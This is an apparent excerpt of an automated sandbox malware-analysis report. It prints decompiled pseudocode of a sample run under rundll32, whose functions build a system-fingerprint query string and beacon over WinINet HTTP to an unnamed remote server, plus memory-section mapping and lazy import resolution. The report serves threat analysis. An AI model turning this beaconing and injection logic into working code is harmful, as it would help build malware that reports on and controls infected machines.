                                      							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                                      						} else {
                                      							 *0x44ba174(0, 1,  &_v12); // executed
                                      							if(0 != 0) {
                                      								_t64 = 8;
                                      							} else {
                                      								_t38 = E044B6D63(0x1000);
                                      								_v16 = _t38;
                                      								if(_t38 == 0) {
                                      									_t64 = 8;
                                      								} else {
                                      									_push(0);
                                      									_push(_v8);
                                      									_push( &_v20);
                                      									while(1) {
                                      										_t41 = _v12;
                                      										_t61 =  *_t41;
                                      										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                                      										ResetEvent( *(_t69 + 0x1c));
                                      										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
                                      										if(_t45 != 0) {
                                      											goto L17;
                                      										}
                                      										_t64 = GetLastError();
                                      										if(_t64 == 0x3e5) {
                                      											_t64 = E044B6E40( *(_t69 + 0x1c), _t61, 0xffffffff);
                                      											if(_t64 == 0) {
                                      												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                      												if(_t64 == 0) {
                                      													goto L17;
                                      												}
                                      											}
                                      										}
                                      										L19:
                                      										E044B6C2C(_v16);
                                      										if(_t64 == 0) {
                                      											_t64 = E044B15CC(_v12, _t69);
                                      										}
                                      										goto L22;
                                      										L17:
                                      										_t64 = 0;
                                      										if(_v8 != 0) {
                                      											_push(0);
                                      											_push(_v8);
                                      											_push(_v16);
                                      											continue;
                                      										}
                                      										goto L19;
                                      									}
                                      								}
                                      								L22:
                                      								_t39 = _v12;
                                      								 *((intOrPtr*)( *_t39 + 8))(_t39);
                                      							}
                                      						}
                                      					} else {
                                      						_t64 = GetLastError();
                                      						if(_t64 != 0x3e5) {
                                      							L8:
                                      							if(_t64 == 0) {
                                      								goto L9;
                                      							}
                                      						} else {
                                      							_t64 = E044B6E40( *(_t69 + 0x1c), _t58, 0xffffffff);
                                      							if(_t64 == 0) {
                                      								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                      								goto L8;
                                      							}
                                      						}
                                      					}
                                      					return _t64;
                                      				} else {
                                      					_t54 = E044B4A85(__ecx, __eax);
                                      					if(_t54 != 0) {
                                      						return _t54;
                                      					} else {
                                      						goto L2;
                                      					}
                                      				}
                                      			}

                                      APIs
                                      • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,76DC81D0,00000000,00000000), ref: 044B739C
                                      • InternetReadFile.WININET(?,?,00000004,?), ref: 044B73AB
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,044B593D,00000000,?,?), ref: 044B73B5
                                      • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,044B593D,00000000,?), ref: 044B742E
                                      • InternetReadFile.WININET(?,?,00001000,?), ref: 044B743F
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,044B593D,00000000,?,?), ref: 044B7449
                                        • Part of subcall function 044B4A85: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,76DC81D0,00000000,00000000), ref: 044B4A9C
                                        • Part of subcall function 044B4A85: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,044B593D,00000000,?), ref: 044B4AAC
                                        • Part of subcall function 044B4A85: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 044B4ADE
                                        • Part of subcall function 044B4A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 044B4B03
                                        • Part of subcall function 044B4A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 044B4B23
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                                      • String ID:
                                      • API String ID: 2393427839-0
                                      • Opcode ID: e8eb901c503490b3d5c22ad987fe4f2c283c87fd602222137a6929441a0db8ce
                                      • Instruction ID: 2c95c6e08deb91fa4231458a5b2324ce43d925360e837127ad86d50da6c7319d
                                      • Opcode Fuzzy Hash: e8eb901c503490b3d5c22ad987fe4f2c283c87fd602222137a6929441a0db8ce
                                      • Instruction Fuzzy Hash: 4141D332600604AFDF219FA5CC40AEF7BB9EFC4361F11452AE581D7290EA30F9028BE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 72%
                                      			E00401000(intOrPtr* __eax, void** _a4) {
                                      				int _v12;
                                      				void* _v16;
                                      				void* _v20;
                                      				void* _v24;
                                      				int _v28;
                                      				int _v32;
                                      				intOrPtr _v36;
                                      				int _v40;
                                      				int _v44;
                                      				void* _v48;
                                      				void* __esi;
                                      				long _t34;
                                      				void* _t39;
                                      				void* _t47;
                                      				intOrPtr* _t48;
                                      
                                      				_t48 = __eax;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				_v24 =  *((intOrPtr*)(__eax + 4));
                                      				_v16 = 0;
                                      				_v12 = 0;
                                      				_v48 = 0x18;
                                      				_v44 = 0;
                                      				_v36 = 0x40;
                                      				_v40 = 0;
                                      				_v32 = 0;
                                      				_v28 = 0;
                                      				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                      				if(_t34 < 0) {
                                      					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                      				} else {
                                      					 *_t48 = _v16;
                                      					_t39 = E00402067(_t48,  &_v12); // executed
                                      					_t47 = _t39;
                                      					if(_t47 != 0) {
                                      						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                      					} else {
                                      						memset(_v12, 0, _v24);
                                      						 *_a4 = _v12;
                                      					}
                                      				}
                                      				return _t47;
                                      			}

                                      APIs
                                      • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000), ref: 0040105D
                                        • Part of subcall function 00402067: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?,?,00000000), ref: 00402094
                                      • memset.NTDLL ref: 0040107F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                                      Similarity
                                      • API ID: Section$CreateViewmemset
                                      • String ID: @
                                      • API String ID: 2533685722-2766056989
                                      • Opcode ID: f88f7b59d057a9b82778a7dd04e6972382e4cc1d9d79e288a0e015176c7d91c1
                                      • Instruction ID: 4f385245036f821fd9b68b3b8714d0476cfa35c7cd9381bf75d25f9cc2b375e3
                                      • Opcode Fuzzy Hash: f88f7b59d057a9b82778a7dd04e6972382e4cc1d9d79e288a0e015176c7d91c1
                                      • Instruction Fuzzy Hash: CB211AB6D00209AFCB11DFA9C8849EEFBB9EF48354F10443AE645F3650D735AA458B64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E00402067(void** __esi, PVOID* _a4) {
                                      				long _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				long _t13;
                                      
                                      				_v16 = 0;
                                      				asm("stosd");
                                      				_v8 = 0;
                                      				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                      				if(_t13 < 0) {
                                      					_push(_t13);
                                      					return __esi[6]();
                                      				}
                                      				return 0;
                                      			}

                                      APIs
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?,?,00000000), ref: 00402094
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                                      Similarity
                                      • API ID: SectionView
                                      • String ID:
                                      • API String ID: 1323581903-0
                                      • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                      • Instruction ID: 3545e7cb7a4688742b4ecc703059954423888001ae5009807625329cafd1149a
                                      • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                      • Instruction Fuzzy Hash: 90F012B590020CBFDB119FA5CC89C9FBBBDEB44354B10497AB252E10D0D6749E089A60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 70%
                                      			E044B56C8(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
                                      				intOrPtr _v4;
                                      				intOrPtr _v8;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				void* _v48;
                                      				intOrPtr _v56;
                                      				void* __edi;
                                      				intOrPtr _t32;
                                      				void* _t33;
                                      				intOrPtr _t35;
                                      				intOrPtr _t36;
                                      				intOrPtr _t37;
                                      				intOrPtr _t38;
                                      				intOrPtr _t39;
                                      				void* _t42;
                                      				intOrPtr _t43;
                                      				int _t46;
                                      				intOrPtr _t47;
                                      				int _t50;
                                      				void* _t51;
                                      				intOrPtr _t55;
                                      				intOrPtr _t56;
                                      				intOrPtr _t62;
                                      				intOrPtr _t66;
                                      				intOrPtr* _t68;
                                      				void* _t69;
                                      				intOrPtr _t74;
                                      				intOrPtr _t80;
                                      				intOrPtr _t83;
                                      				intOrPtr _t86;
                                      				int _t89;
                                      				intOrPtr _t90;
                                      				int _t93;
                                      				intOrPtr _t95;
                                      				int _t98;
                                      				intOrPtr _t100;
                                      				int _t103;
                                      				void* _t105;
                                      				void* _t106;
                                      				void* _t110;
                                      				void* _t112;
                                      				void* _t113;
                                      				intOrPtr _t114;
                                      				long _t116;
                                      				intOrPtr* _t117;
                                      				intOrPtr* _t118;
                                      				long _t119;
                                      				int _t120;
                                      				void* _t121;
                                      				void* _t122;
                                      				void* _t123;
                                      				void* _t126;
                                      				void* _t127;
                                      				void* _t129;
                                      				void* _t130;
                                      
                                      				_t110 = __edx;
                                      				_t106 = __ecx;
                                      				_t127 =  &_v16;
                                      				_t119 = __eax;
                                      				_t32 =  *0x44ba3e0; // 0x4e69b78
                                      				_v4 = _t32;
                                      				_v8 = 8;
                                      				_t33 = RtlAllocateHeap( *0x44ba2d8, 0, 0x800); // executed
                                      				_t105 = _t33;
                                      				if(_t105 != 0) {
                                      					if(_t119 == 0) {
                                      						_t119 = GetTickCount();
                                      					}
                                      					_t35 =  *0x44ba018; // 0x1af7f861
                                      					asm("bswap eax");
                                      					_t36 =  *0x44ba014; // 0x3a87c8cd
                                      					asm("bswap eax");
                                      					_t37 =  *0x44ba010; // 0xd8d2f808
                                      					asm("bswap eax");
                                      					_t38 =  *0x44ba00c; // 0x8f8f86c2
                                      					asm("bswap eax");
                                      					_t39 =  *0x44ba348; // 0x9ad5a8
                                      					_t3 = _t39 + 0x44bb62b; // 0x74666f73
                                      					_t120 = wsprintfA(_t105, _t3, 2, 0x3d175, _t38, _t37, _t36, _t35,  *0x44ba02c,  *0x44ba004, _t119);
                                      					_t42 = E044B6927();
                                      					_t43 =  *0x44ba348; // 0x9ad5a8
                                      					_t4 = _t43 + 0x44bb66b; // 0x74707526
                                      					_t46 = wsprintfA(_t120 + _t105, _t4, _t42);
                                      					_t129 = _t127 + 0x38;
                                      					_t121 = _t120 + _t46;
                                      					if(_a12 != 0) {
                                      						_t100 =  *0x44ba348; // 0x9ad5a8
                                      						_t8 = _t100 + 0x44bb676; // 0x732526
                                      						_t103 = wsprintfA(_t121 + _t105, _t8, _a12);
                                      						_t129 = _t129 + 0xc;
                                      						_t121 = _t121 + _t103;
                                      					}
                                      					_t47 =  *0x44ba348; // 0x9ad5a8
                                      					_t10 = _t47 + 0x44bb2de; // 0x74636126
                                      					_t50 = wsprintfA(_t121 + _t105, _t10, 0);
                                      					_t130 = _t129 + 0xc;
                                      					_t122 = _t121 + _t50; // executed
                                      					_t51 = E044B22D7(_t106); // executed
                                      					_t112 = _t51;
                                      					if(_t112 != 0) {
                                      						_t95 =  *0x44ba348; // 0x9ad5a8
                                      						_t12 = _t95 + 0x44bb8d0; // 0x736e6426
                                      						_t98 = wsprintfA(_t122 + _t105, _t12, _t112);
                                      						_t130 = _t130 + 0xc;
                                      						_t122 = _t122 + _t98;
                                      						HeapFree( *0x44ba2d8, 0, _t112);
                                      					}
                                      					_t113 = E044B2A11();
                                      					if(_t113 != 0) {
                                      						_t90 =  *0x44ba348; // 0x9ad5a8
                                      						_t14 = _t90 + 0x44bb8d8; // 0x6f687726
                                      						_t93 = wsprintfA(_t122 + _t105, _t14, _t113);
                                      						_t130 = _t130 + 0xc;
                                      						_t122 = _t122 + _t93;
                                      						HeapFree( *0x44ba2d8, 0, _t113);
                                      					}
                                      					_t114 =  *0x44ba3cc; // 0x4e695b0
                                      					_a20 = E044B2509(0x44ba00a, _t114 + 4);
                                      					_t55 =  *0x44ba370; // 0x0
                                      					_t116 = 0;
                                      					if(_t55 != 0) {
                                      						_t86 =  *0x44ba348; // 0x9ad5a8
                                      						_t17 = _t86 + 0x44bb8b2; // 0x3d736f26
                                      						_t89 = wsprintfA(_t122 + _t105, _t17, _t55);
                                      						_t130 = _t130 + 0xc;
                                      						_t122 = _t122 + _t89;
                                      					}
                                      					_t56 =  *0x44ba36c; // 0x0
                                      					if(_t56 != _t116) {
                                      						_t83 =  *0x44ba348; // 0x9ad5a8
                                      						_t19 = _t83 + 0x44bb889; // 0x3d706926
                                      						wsprintfA(_t122 + _t105, _t19, _t56);
                                      					}
                                      					if(_a20 != _t116) {
                                      						_t123 = RtlAllocateHeap( *0x44ba2d8, _t116, 0x800);
                                      						if(_t123 != _t116) {
                                      							E044B1BE9(GetTickCount());
                                      							_t62 =  *0x44ba3cc; // 0x4e695b0
                                      							__imp__(_t62 + 0x40);
                                      							asm("lock xadd [eax], ecx");
                                      							_t66 =  *0x44ba3cc; // 0x4e695b0
                                      							__imp__(_t66 + 0x40);
                                      							_t68 =  *0x44ba3cc; // 0x4e695b0
                                      							_t69 = E044B1D33(1, _t110, _t105,  *_t68); // executed
                                      							_t126 = _t69;
                                      							asm("lock xadd [eax], ecx");
                                      							if(_t126 != _t116) {
                                      								StrTrimA(_t126, 0x44b928c);
                                      								_push(_t126);
                                      								_t74 = E044B393C();
                                      								_v20 = _t74;
                                      								if(_t74 != _t116) {
                                      									_t117 = __imp__;
                                      									 *_t117(_t126, _v8);
                                      									 *_t117(_t123, _v8);
                                      									_t118 = __imp__;
                                      									 *_t118(_t123, _v32);
                                      									 *_t118(_t123, _t126);
                                      									_t80 = E044B375F(0xffffffffffffffff, _t123, _v28, _v24); // executed
                                      									_v56 = _t80;
                                      									if(_t80 != 0 && _t80 != 0x10d2) {
                                      										E044B561E();
                                      									}
                                      									HeapFree( *0x44ba2d8, 0, _v48);
                                      									_t116 = 0;
                                      								}
                                      								HeapFree( *0x44ba2d8, _t116, _t126);
                                      							}
                                      							RtlFreeHeap( *0x44ba2d8, _t116, _t123); // executed
                                      						}
                                      						HeapFree( *0x44ba2d8, _t116, _a12);
                                      					}
                                      					RtlFreeHeap( *0x44ba2d8, _t116, _t105); // executed
                                      				}
                                      				return _v16;
                                      			}

                                      APIs
                                      • RtlAllocateHeap.NTDLL ref: 044B56F0
                                      • GetTickCount.KERNEL32 ref: 044B5704
                                      • wsprintfA.USER32 ref: 044B5753
                                      • wsprintfA.USER32 ref: 044B5770
                                      • wsprintfA.USER32 ref: 044B5791
                                      • wsprintfA.USER32 ref: 044B57A9
                                      • wsprintfA.USER32 ref: 044B57CC
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 044B57DC
                                      • wsprintfA.USER32 ref: 044B57FE
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 044B580E
                                      • wsprintfA.USER32 ref: 044B5847
                                      • wsprintfA.USER32 ref: 044B5867
                                      • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 044B5882
                                      • GetTickCount.KERNEL32 ref: 044B5892
                                      • RtlEnterCriticalSection.NTDLL(04E69570), ref: 044B58A6
                                      • RtlLeaveCriticalSection.NTDLL(04E69570), ref: 044B58C4
                                      • StrTrimA.SHLWAPI(00000000,044B928C,00000000,04E695B0), ref: 044B58F6
                                      • lstrcpy.KERNEL32(00000000,?), ref: 044B5915
                                      • lstrcpy.KERNEL32(00000000,?), ref: 044B591C
                                      • lstrcat.KERNEL32(00000000,?), ref: 044B5929
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 044B592D
                                      • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 044B595D
                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 044B596D
                                      • RtlFreeHeap.NTDLL(00000000,00000000,00000000,04E695B0), ref: 044B597B
                                      • HeapFree.KERNEL32(00000000,?), ref: 044B598C
                                      • RtlFreeHeap.NTDLL(00000000,00000000), ref: 044B599A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Heap$wsprintf$Free$AllocateCountCriticalSectionTicklstrcatlstrcpy$EnterLeaveTrim
                                      • String ID:
                                      • API String ID: 2591679948-0
                                      • Opcode ID: 9b6b585ec8dad14eaff5029eaf6c6051e541114e6c3c9f9ebc725a1bac4f5798
                                      • Instruction ID: 2561da8ad065e4aa016133e2b923175a76d881fda8b4a5ce5babe1aee2efd45f
                                      • Opcode Fuzzy Hash: 9b6b585ec8dad14eaff5029eaf6c6051e541114e6c3c9f9ebc725a1bac4f5798
                                      • Instruction Fuzzy Hash: DF81D671500704AFEB11AFA9EC48E977BE8EB88704B050525F988E7211DA39ED14DBF1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 92%
                                      			E044B7AF1(void* __eax, void* __ecx, long __esi, char* _a4) {
                                      				void _v8;
                                      				long _v12;
                                      				void _v16;
                                      				void* _t34;
                                      				void* _t38;
                                      				void* _t40;
                                      				char* _t56;
                                      				long _t57;
                                      				void* _t58;
                                      				intOrPtr _t59;
                                      				long _t65;
                                      
                                      				_t65 = __esi;
                                      				_t58 = __ecx;
                                      				_v16 = 0xea60;
                                      				__imp__( *(__esi + 4));
                                      				_v12 = __eax + __eax;
                                      				_t56 = E044B6D63(__eax + __eax + 1);
                                      				if(_t56 != 0) {
                                      					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                                      						E044B6C2C(_t56);
                                      					} else {
                                      						E044B6C2C( *(__esi + 4));
                                      						 *(__esi + 4) = _t56;
                                      					}
                                      				}
                                      				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                                      				 *(_t65 + 0x10) = _t34;
                                      				if(_t34 == 0 || InternetSetStatusCallback(_t34, E044B7A86) == 0xffffffff) {
                                      					L15:
                                      					return GetLastError();
                                      				} else {
                                      					ResetEvent( *(_t65 + 0x1c));
                                      					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
                                      					 *(_t65 + 0x14) = _t38;
                                      					if(_t38 != 0 || GetLastError() == 0x3e5 && E044B6E40( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                                      						_t59 =  *0x44ba348; // 0x9ad5a8
                                      						_t15 = _t59 + 0x44bb73b; // 0x544547
                                      						_v8 = 0x84404000;
                                      						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
                                      						 *(_t65 + 0x18) = _t40;
                                      						if(_t40 == 0) {
                                      							goto L15;
                                      						}
                                      						_t57 = 4;
                                      						_v12 = _t57;
                                      						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                                      							_v8 = _v8 | 0x00000100;
                                      							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                                      						}
                                      						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                                      							goto L15;
                                      						} else {
                                      							return 0;
                                      						}
                                      					} else {
                                      						goto L15;
                                      					}
                                      				}
                                      			}

                                      APIs
                                      • lstrlen.KERNEL32(?,00000008,76D84D40), ref: 044B7B03
                                        • Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F
                                      • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 044B7B26
                                      • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 044B7B4E
                                      • InternetSetStatusCallback.WININET(00000000,044B7A86), ref: 044B7B65
                                      • ResetEvent.KERNEL32(?), ref: 044B7B77
                                      • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 044B7B8A
                                      • GetLastError.KERNEL32 ref: 044B7B97
                                      • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 044B7BDD
                                      • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 044B7BFB
                                      • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 044B7C1C
                                      • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 044B7C28
                                      • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 044B7C38
                                      • GetLastError.KERNEL32 ref: 044B7C42
                                        • Part of subcall function 044B6C2C: RtlFreeHeap.NTDLL(00000000,00000000,044B5E1D,00000000,?,?,00000000), ref: 044B6C38
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                      • String ID:
                                      • API String ID: 2290446683-0
                                      • Opcode ID: b2b97b47b806c1d26881e2cf767af8386c3c35c19590de7371c60c01d011b30b
                                      • Instruction ID: 5bf633c85e651b6842098d54ee217649844aa599f64a2a8294be5c005ab6552e
                                      • Opcode Fuzzy Hash: b2b97b47b806c1d26881e2cf767af8386c3c35c19590de7371c60c01d011b30b
                                      • Instruction Fuzzy Hash: 5A419471500604BFEB319F69DC49E9B7BBDEB85705F10492EF582E1290E735AA44CBB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      C-Code - Quality: 51%
                                      			E044B7F35(long _a4, long _a8) {
                                      				signed int _v8;
                                      				intOrPtr _v16;
                                      				LONG* _v28;
                                      				long _v40;
                                      				long _v44;
                                      				long _v48;
                                      				CHAR* _v52;
                                      				long _v56;
                                      				CHAR* _v60;
                                      				long _v64;
                                      				signed int* _v68;
                                      				char _v72;
                                      				signed int _t76;
                                      				signed int _t80;
                                      				signed int _t81;
                                      				intOrPtr* _t82;
                                      				intOrPtr* _t83;
                                      				intOrPtr* _t85;
                                      				intOrPtr* _t90;
                                      				intOrPtr* _t95;
                                      				intOrPtr* _t98;
                                      				struct HINSTANCE__* _t99;
                                      				void* _t102;
                                      				intOrPtr* _t104;
                                      				void* _t115;
                                      				long _t116;
                                      				void _t125;
                                      				void* _t131;
                                      				signed short _t133;
                                      				struct HINSTANCE__* _t138;
                                      				signed int* _t139;
                                      
                                      				_t139 = _a4;
                                      				_v28 = _t139[2] + 0x44b0000;
                                      				_t115 = _t139[3] + 0x44b0000;
                                      				_t131 = _t139[4] + 0x44b0000;
                                      				_v8 = _t139[7];
                                      				_v60 = _t139[1] + 0x44b0000;
                                      				_v16 = _t139[5] + 0x44b0000;
                                      				_v64 = _a8;
                                      				_v72 = 0x24;
                                      				_v68 = _t139;
                                      				_v56 = 0;
                                      				asm("stosd");
                                      				_v48 = 0;
                                      				_v44 = 0;
                                      				_v40 = 0;
                                      				if(( *_t139 & 0x00000001) == 0) {
                                      					_a8 =  &_v72;
                                      					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                      					return 0;
                                      				}
                                      				_t138 =  *_v28;
                                      				_t76 = _a8 - _t115 >> 2 << 2;
                                      				_t133 =  *(_t131 + _t76);
                                      				_a4 = _t76;
                                      				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                      				_v56 = _t80;
                                      				_t81 = _t133 + 0x44b0002;
                                      				if(_t80 == 0) {
                                      					_t81 = _t133 & 0x0000ffff;
                                      				}
                                      				_v52 = _t81;
                                      				_t82 =  *0x44ba1c0; // 0x0
                                      				_t116 = 0;
                                      				if(_t82 == 0) {
                                      					L6:
                                      					if(_t138 != 0) {
                                      						L18:
                                      						_t83 =  *0x44ba1c0; // 0x0
                                      						_v48 = _t138;
                                      						if(_t83 != 0) {
                                      							_t116 =  *_t83(2,  &_v72);
                                      						}
                                      						if(_t116 != 0) {
                                      							L32:
                                      							 *_a8 = _t116;
                                      							L33:
                                      							_t85 =  *0x44ba1c0; // 0x0
                                      							if(_t85 != 0) {
                                      								_v40 = _v40 & 0x00000000;
                                      								_v48 = _t138;
                                      								_v44 = _t116;
                                      								 *_t85(5,  &_v72);
                                      							}
                                      							return _t116;
                                      						} else {
                                      							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                      								L27:
                                      								_t116 = GetProcAddress(_t138, _v52);
                                      								if(_t116 == 0) {
                                      									_v40 = GetLastError();
                                      									_t90 =  *0x44ba1bc; // 0x0
                                      									if(_t90 != 0) {
                                      										_t116 =  *_t90(4,  &_v72);
                                      									}
                                      									if(_t116 == 0) {
                                      										_a4 =  &_v72;
                                      										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                      										_t116 = _v44;
                                      									}
                                      								}
                                      								goto L32;
                                      							} else {
                                      								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                      								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                      									_t116 =  *(_a4 + _v16);
                                      									if(_t116 != 0) {
                                      										goto L32;
                                      									}
                                      								}
                                      								goto L27;
                                      							}
                                      						}
                                      					}
                                      					_t98 =  *0x44ba1c0; // 0x0
                                      					if(_t98 == 0) {
                                      						L9:
                                      						_t99 = LoadLibraryA(_v60); // executed
                                      						_t138 = _t99;
                                      						if(_t138 != 0) {
                                      							L13:
                                      							if(InterlockedExchange(_v28, _t138) == _t138) {
                                      								FreeLibrary(_t138);
                                      							} else {
                                      								if(_t139[6] != 0) {
                                      									_t102 = LocalAlloc(0x40, 8);
                                      									if(_t102 != 0) {
                                      										 *(_t102 + 4) = _t139;
                                      										_t125 =  *0x44ba1b8; // 0x0
                                      										 *_t102 = _t125;
                                      										 *0x44ba1b8 = _t102;
                                      									}
                                      								}
                                      							}
                                      							goto L18;
                                      						}
                                      						_v40 = GetLastError();
                                      						_t104 =  *0x44ba1bc; // 0x0
                                      						if(_t104 == 0) {
                                      							L12:
                                      							_a8 =  &_v72;
                                      							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                      							return _v44;
                                      						}
